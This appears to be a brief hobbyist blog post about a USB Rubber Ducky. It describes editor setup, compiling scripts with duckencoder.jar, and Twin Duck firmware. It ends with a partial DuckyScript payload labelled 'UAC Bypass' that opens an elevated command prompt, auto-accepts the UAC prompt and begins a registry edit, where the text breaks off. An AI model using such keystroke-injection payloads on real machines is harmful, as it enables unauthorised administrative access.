Skip to main content

Posts

Showing posts with the label General

General -Rubber Ducky

RubberDUcky So I just got a rubber ducky and have been playing around with it Here is some of my first couple of days 1st thing I did was import the lanugauge in Notepad++ to write my scripts in you can find the xml file here ( https://forums.hak5.org/topic/21045-encoder-duckyscript-notepad-userdefinedlanguage/ ) I also set a custom console to compile the scripts using the duckencoder.jar CD: C:\users\********\Desktop\Ducky Current directory: C:\users\******\Desktop\Ducky java -jar duckencoder.jar -i ipconfig -o inject.bin I also changed the firmware to twin ducky so I can read/write to the SD card while running payload https://forums.hak5.org/topic/28162-firmware-introducing-twin-duck/ My first little scrip I borrowed a bit from some other posts but i'm still not entirely happy with it  REM *** UAC Bypass *** DELAY 3000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 500 ALT y DELAY 200 STRING reg add HKCU\So